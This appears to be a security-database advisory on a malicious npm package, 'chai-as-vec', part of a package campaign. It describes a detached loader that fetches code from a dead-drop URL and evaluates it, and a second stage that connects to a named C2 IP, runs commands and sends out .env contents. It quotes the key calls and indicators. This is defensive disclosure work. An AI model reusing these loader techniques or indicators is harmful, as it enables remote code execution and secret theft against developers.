VDB
GCVE-110-OSM-2026-3457
GCVE-110-OSM-2026-3457
Advisory PublishedCVSS 9.6/10
Downloads and executes attacker-controlled JavaScript from a npoint.io dead-drop (`https://api.npoint.io/244f4de235f04fbcd51a`) via `Function.constructor` RCE at require-time; the fetched second-stage payload — byte-identical to sibling package motion-ui-tool — connects to C2 server `107.189.20.11` over socket.io, executes arbitrary commands via `child_process.execSync`, and exfiltrates `.env` file contents and `USER`/`USERNAME` environment variables. Part of a coordinated six-package campaign published by `chaley260430` (leandrabb1010@outlook.com).
**Trigger** (require-time): when the exported middleware function is invoked, `index.js:runBackgroundTask()` calls `child_process.spawn('node', ['lib/initializeCaller.js', JSON.stringify(args)], {detached: true})` + `child.unref()` — the spawned loader outlives the parent process.
**Stage-1 obfuscation**: `lib/initializeCaller.js` holds three base64-encoded inline literals decoded at runtime to recover the C2 URL, the request header name (`x-secret-key`), and the campaign token value (`_`).
**Stage-1 C2 fetch**: issues `axios.get('https://api.npoint.io/244f4de235f04fbcd51a', {headers: {'x-secret-key': '_'}})` to the npoint.io dead-drop and receives the stage-2 payload in `response.data.cookie`.
**RCE**: evaluates the returned payload via `new Function.constructor('require', response.data.cookie)(require)`, granting full Node.js `require()` access to arbitrary attacker code.
**Stage-2 (confirmed)**: the fetched payload (SHA256 `b2aa6d0a427039c7b534363349d24ad815d36879e79d37a6b8262965072f38cd`, byte-identical to sibling package motion-ui-tool) establishes a persistent socket.io connection to `107.189.20.11`, relays attacker-issued commands via `child_process.execSync`/`cmd.exe`, and collects `.env` file contents plus `USER`/`USERNAME` environment variables.
**Phantom deps**: `request`, `sqlite3`, and `parse-json` are declared in `package.json` but never required in stage-1 source.
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | chai-as-vec | 2.3.5 (affected) | — |
Browse GCVE Records
73,443 records in the GCVE database · Updated July 18, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.